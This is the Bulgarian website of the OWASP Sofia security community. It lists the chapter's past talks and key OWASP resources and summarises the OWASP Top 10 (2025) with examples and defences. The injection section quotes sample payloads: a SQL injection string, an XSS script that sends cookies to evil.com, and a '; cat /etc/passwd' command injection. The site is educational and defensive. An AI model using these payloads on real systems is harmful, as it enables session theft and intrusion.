OWASP лого

OWASP Sofia

Първата българска OWASP общност — част от OWASP (Open Worldwide Application Security Project) — глобална нестопанска организация, посветена на подобряването на сигурността на софтуера. Обединяваме ентусиасти, професионалисти и експерти по киберсигурност с мисията да направим дигиталния свят по-сигурен чрез образование, споделяне на знания и отворено сътрудничество.

25+
Презентации
30+
Лектори
6
Години
100%
Безплатно и отворено

Какво е OWASP?

Запознайте се с организацията и нашата мисия в България.

OWASP Foundation

OWASP е международна нестопанска организация, създадена през 2001 г., чиято цел е софтуерната сигурност да бъде видима и достъпна за всички. Всички материали са безплатни и с отворен достъп — инструменти, документация, стандарти и стотици глави по целия свят.

owasp.org →

OWASP Sofia — нашата мисия

Като първата OWASP общност в България, ние:

  • Организираме редовни срещи с презентации и дискусии
  • Популяризираме най-добрите практики в сигурността
  • Споделяме знания и опит между професионалисти
  • Превеждаме ключови OWASP ресурси на български
  • Изграждаме мост между глобалната общност и България

Събития

Архив на минали презентации с линкове към записи и материали.

Дата Тема Лектор Ресурси
2025
10.12.2025 OWASP Top 10:2025 Miglen Evlogiev Video
10.12.2025 Metrics in Cybersecurity — Effective vs Non-effective reporting Ionko Ionkoff Video
10.12.2025 Software Supply Chain Security Explained Kostadin Ivanov Video
16.10.2025 AWS Security services and cloud compliances Ivica Micev Video
16.10.2025 It's not DNS. There's no way it's DNS. It was DNS. Presian Yankulov Video
16.10.2025 Introduction to binary exploitation Simeon Nguen Video
28.05.2025 How to fail with .NET reflection 101 Ivan Ivanov Video
28.05.2025 Effective Threat Modelling Yordan Popov (Dan Ny) Video
28.05.2025 Scoring Vulnerabilities using CVSS Martin Georgiev Video
21.03.2025 Coordinating Defense: My take on effective security testing strategies Dimo Stankov Video
21.03.2025 Secure Software Development: Overview and practical examples Radostina Kondakova Video
21.03.2025 Broken Access Control: Tackling OWASP's #1 Vulnerability Spas Genov Video
31.01.2025 OS Command Injection via CRLF Injection in SNMP Services Peter Djalaliev Video
31.01.2025 Active Directory Exploitation Lyuben Petrov Video
31.01.2025 Authentication Gone Bad: Penetration Testing Techniques for Chaining Vulnerabilities Milcho Hekimov Video
2024
13.12.2024 OWASP Top 10 attacks & defenses Nikolay Dimitrov
13.12.2024 How did I end up in your car Zdravko Zdravkov
18.10.2024 Is a Data strategy needed? Svetlana Videnova Video
18.10.2024 API Security in the age of AI Evgeni Dyulgerov Video
2022
28.06.2022 Why hackers love Javascript? Martin Stoynov
2021
31.07.2021 AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn't an SSA Program Dan Cornell Video Slides
21.07.2021 Understanding AWS cloud attacks using CloudGoat Kavisha Sheth Video
21.07.2021 Learn Android application security testing using AndroGoat Satish Patnayak Video
27.04.2021 XSS Attacks and Defenses Dimitar Boyanov Video Slides
27.03.2021 Compromising Modern Online Banking Apps through Hijacking Android Devices Dr. Svetlin Nakov Slides
2019
27.06.2019 Pros & Cons of Penetration Testing Atanas Pashov Slides
09.05.2019 Penetration Testing: OSINT Angel Bochev Video Slides

Ресурси

Ключови OWASP проекти и материали — част от тях преведени на български.

OWASP ASVS

Application Security Verification Standard — рамка за тестване на сигурността на уеб приложения и определяне на изисквания.

EN English Научи повече →

OWASP Testing Guide

Изчерпателно ръководство за тестване на сигурността на уеб приложения с практически методологии и техники.

EN English Научи повече →

OWASP Cheat Sheet Series

Колекция от кратки и практични ръководства по конкретни теми в сигурността на приложенията.

EN English Научи повече →

OWASP SAMM

Software Assurance Maturity Model — модел за оценка и подобряване на практиките за сигурност в софтуерната разработка.

EN English Научи повече →

OWASP ZAP

Безплатен инструмент с отворен код за автоматизирано тестване на сигурността на уеб приложения.

EN English Научи повече →

OWASP Mobile Application Security

Стандарт и ръководство за тестване на сигурността на мобилни приложения (MASVS и MASTG).

EN English Научи повече →

OWASP Dependency-Check

Инструмент за Software Composition Analysis (SCA) — открива публично известни уязвимости в зависимостите на проекта.

EN English Научи повече →

OWASP Juice Shop

Умишлено уязвимо уеб приложение за обучение и практика по сигурност — идеално за CTF и workshops.

EN English Научи повече →

OWASP AI Security

Ръководства и стандарти за сигурност на AI/ML системи — заплахи, атаки и защита на модели и данни.

EN English Научи повече →

OWASP API Security

Top 10 рискове за сигурността на API — специализиран списък за REST, GraphQL и други API архитектури.

EN English Научи повече →

OWASP ModSecurity Core Rule Set

Набор от правила за Web Application Firewall (WAF) — защита от injection, XSS и други атаки на ниво HTTP трафик.

EN English Научи повече →

OWASP Amass

Инструмент за мрежово картографиране и discovery на attack surface — DNS enumeration, ASN discovery и OSINT.

EN English Научи повече →

OWASP Top 10 (2025)

Списъкът на десетте най-критични класа уязвимости в уеб приложенията — актуализиран на всеки 3–4 години. Спрямо 2021: SSRF отпада, влиза новата категория за грешна обработка на изключения. Редът значително се е променил. Пълен списък (EN) →

Потребители достъпват ресурси извън правата си. Запазва позицията си като най-честата уязвимост.

Примери: IDOR (Insecure Direct Object Reference) — промяна на /api/user/123 на /api/user/456 за достъп до чужд акаунт. Privilege escalation — обикновен потребител достъпва администраторски панел. Липсващи authorization checks на API endpoints.

Препоръчани мерки: Прилагайте deny-by-default подход. Проверявайте правата на сървъра при всяка заявка. Използвайте RBAC (Role-Based Access Control). Деактивирайте directory listing. Логвайте и алертирайте при повтарящи се неуспешни опити за достъп.

Прочети повече →

Прескача от A05 на A02. Изключително честа в облачни среди поради сложността на конфигурацията.

Примери: Default credentials оставени в production (admin/admin). Излишни услуги и портове отворени. Verbose error messages, разкриващи stack traces. Публично достъпен S3 bucket. XXE (XML External Entity) атаки чрез некоректно конфигуриран XML parser.

Препоръчани мерки: Автоматизирайте hardening процесите. Премахвайте ненужни features и frameworks. Преглеждайте cloud permissions редовно. Използвайте Infrastructure as Code със security scanning. Деактивирайте XML external entity processing.

Прочети повече →

Еволюция на „Vulnerable Components“ — разширена до цялата верига на доставки на софтуер.

Примери: Злонамерени пакети в npm/PyPI (typosquatting — loadash вместо lodash). Компрометирани CI/CD pipelines — атакуващ инжектира код в build процеса. XZ Utils backdoor (CVE-2024-3094) — злонамерен код вграден в популярна compression библиотека.

Препоръчани мерки: Поддържайте Software Bill of Materials (SBOM). Използвайте lock files и проверявайте integrity hashes. Сканирайте зависимостите с SCA инструменти (Dependabot, Snyk). Подписвайте артефактите с Sigstore/cosign. Ограничете достъпа до CI/CD pipeline конфигурации.

Прочети повече →

Слизане от A02 на A04. Чувствителни данни, предавани или съхранявани без адекватно криптиране.

Примери: Пароли хеширани с MD5 или SHA-1 вместо bcrypt/Argon2. Липса на HTTPS — данни предавани в plaintext. Слаби TLS конфигурации (TLS 1.0/1.1). Hardcoded API ключове и secrets в сорс кода. Sensitive data в URL параметри, видими в server logs.

Препоръчани мерки: Криптирайте данните at rest и in transit. Използвайте TLS 1.2+ с модерни cipher suites. Хеширайте пароли с bcrypt, scrypt или Argon2id. Генерирайте ключове с CSPRNG. Не съхранявайте чувствителни данни без нужда. Управлявайте secrets чрез vault системи.

Прочети повече →

Невалидирани входни данни, интерпретирани като команди. Слиза от A03 на A05, но остава изключително опасна.

Примери: SQL Injection — ' OR 1=1 -- в login форма. XSS (Cross-Site Scripting) — <script>document.location='evil.com?c='+document.cookie</script>. OS Command Injection — ; cat /etc/passwd в input поле. LDAP injection в корпоративни директории.

Препоръчани мерки: Използвайте параметризирани заявки (prepared statements) винаги. Прилагайте input validation с allowlists. Escape-вайте output според контекста (HTML, JS, SQL). Използвайте ORM frameworks. Прилагайте Content Security Policy (CSP) за XSS защита.

Прочети повече →

Проблемите в архитектурата не могат да се поправят само с добра имплементация — трябват фундаментални промени в дизайна.

Примери: Password recovery чрез „security questions“ с лесно достъпни отговори. Липса на rate limiting на критични операции (password reset, SMS verification). Бизнес логика, позволяваща купуване на продукти с отрицателна цена. API без pagination, позволяващ dump на цялата база.

Препоръчани мерки: Прилагайте threat modeling (STRIDE, PASTA) при проектиране. Дефинирайте security requirements от началото. Използвайте secure design patterns и reference architectures. Включвайте abuse cases и negative testing в QA процеса. Прилагайте principle of least privilege в архитектурата.

Прочети повече →

Слабости в механизмите за удостоверяване на самоличността. Остава на A07 с леко разширен обхват.

Примери: Credential stuffing — автоматизирано тестване на откраднати username/password двойки. Липса на MFA за критични операции. Session fixation — атакуващ задава session ID преди автентикация. JWT tokens без expiration или с alg: none. Пароли без минимална сложност.

Препоръчани мерки: Имплементирайте MFA (multi-factor authentication). Използвайте rate limiting и account lockout. Генерирайте нов session ID след login. Валидирайте JWT с правилен алгоритъм и expiration. Интегрирайте проверка срещу списъци с компрометирани пароли (Have I Been Pwned API).

Прочети повече →

Код и инфраструктура, които не проверяват целостта на софтуера и данните.

Примери: SolarWinds Orion — компрометиран build процес инжектира backdoor в легитимен софтуер. XZ Utils (CVE-2024-3094) — злонамерен maintainer вгражда backdoor. Insecure deserialization — ObjectInputStream.readObject() без validation. Auto-update механизъм без проверка на цифров подпис.

Препоръчани мерки: Подписвайте и верифицирайте всички software updates. Защитете CI/CD pipeline с access controls и audit logs. Избягвайте deserialization на untrusted данни. Използвайте Subresource Integrity (SRI) за CDN ресурси. Мониторирайте зависимостите за known vulnerabilities.

Прочети повече →

Липса на адекватно логване и алерти при аномалии. Атаките остават незабелязани средно 207 дни.

Примери: Неуспешни login опити не се логват — brute force атаките остават незабелязани. Логове без timestamps или source IP. Липса на алерти при масово изтегляне на данни (data exfiltration). Логове съхранявани само локално — атакуващ ги изтрива. Sensitive данни (пароли, tokens) записани в логове.

Препоръчани мерки: Логвайте всички authentication, access control и input validation грешки. Изпращайте логовете към централизирана SIEM система. Настройте алерти за подозрителни модели (multiple failed logins, unusual data access). Не логвайте sensitive данни. Дефинирайте incident response план и тествайте го редовно.

Прочети повече →

Нова за 2025. Заменя SSRF. Неправилна обработка на грешки и изключителни ситуации, водещи до непредвидено поведение.

Примери: Null pointer dereference, причиняващ crash на критичен сървис. Race conditions при финансови транзакции — double spending. Необработени изключения, разкриващи вътрешна информация за системата. Timeout failures, оставящи ресурси в inconsistent state. Off-by-one errors в boundary checks.

Препоръчани мерки: Имплементирайте comprehensive error handling за всички code paths. Използвайте generic error messages за потребителите. Прилагайте defensive programming — валидирайте assumptions. Тествайте с fuzzing и chaos engineering. Използвайте mutex/locks за предотвратяване на race conditions. Дефинирайте graceful degradation стратегии.

Прочети повече →

Екип

Настоящите лидери на OWASP Sofia.

ME

Miglen Evlogiev

Chapter Leader

TT

Todor Todorov

Chapter Leader

MS

Martin Stoynov

Chapter Leader

Приятелски организации

Организации и общности, с които споделяме мисия и ценности.

Контакти и общност

Свържете се с нас или се присъединете към общността.